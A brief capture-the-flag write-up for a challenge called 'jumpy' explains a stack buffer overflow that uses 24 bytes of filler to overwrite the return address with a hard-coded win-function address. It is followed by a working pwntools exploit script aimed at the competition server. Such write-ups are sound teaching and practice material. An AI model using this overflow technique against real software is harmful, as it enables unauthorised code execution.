
This challenge was two parts, the first part was overflowing the buffer of size, and the second part was overwriting the return address with the address of winrar. Since there was no alsr and we are given the binary, the address can be hard coded.
The size needed to prime fill the stack up to the return address was 24
, so we sent 24 A's and the return address
Exploit
from pwn import *
import time
context(arch='amd64', os='linux')
context.log_level = True
binary = ELF('jumpy')
competition = True
if competition:
conn = remote("wcscctf.org", 8484)
else:
conn = remote('localhost', 1234)
def getInput():
print conn.recvline()
def sendPayload():
#no aslr
winAddress = p64(0x400636)
filler = 'a'*24
payload = filler + winAddress
#test the payload in gdb to see if it overwrote registers
with open('payload', 'w') as f:
f.write(payload)
conn.sendline(payload)
time.sleep(1)
print conn.recvline() + conn.recvline()
if __name__ == "__main__":
getInput()
sendPayload()